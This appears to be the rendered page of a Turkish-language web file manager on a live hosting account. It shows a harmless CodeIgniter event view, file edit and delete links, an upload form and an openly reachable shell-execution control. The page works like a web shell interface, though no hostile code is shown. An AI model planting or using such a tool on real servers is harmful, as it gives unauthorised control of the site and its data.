⚠️ **YÜKSEK GÜVENLİK RİSKİ:** Bu dosya herkese açık ve şifresizdir. Lütfen sadece **yerel ortamınızda** kullanın ve işiniz bittiğinde **silin**.
Aktif Dizin:
/home/dltain/public_html/app/Views/events
Dosya Düzenle: detail.php
<?=$this->extend('layout/page');?> <?=$this->section('content');?> <h2><?= esc($event['title']) ?></h2> <p><strong>Date:</strong> <?= date("F j, Y", strtotime($event['event_date'])) ?></p> <p><strong>Location:</strong> <?= esc($event['location']) ?></p> <?php if ($event['image']): ?> <img src="<?= base_url('uploads/events/'.$event['image']) ?>" width="300"> <?php endif; ?> <p><?= esc($event['description']) ?></p> <?=$this->endSection()?>
Değişiklikleri Kaydet
Yeni Dosya Yükle (Mevcut Dizine)
Yükle
Adı
Tipi
Boyut
İşlemler
📁
.. (Üst Dizin)
📄 calender.php
Dosya
0.92 KB
Düzenle
Sil
📄 detail.php
Dosya
0.47 KB
Düzenle
Sil
Sorun Giderme (Shell Erişimi)
Çalıştır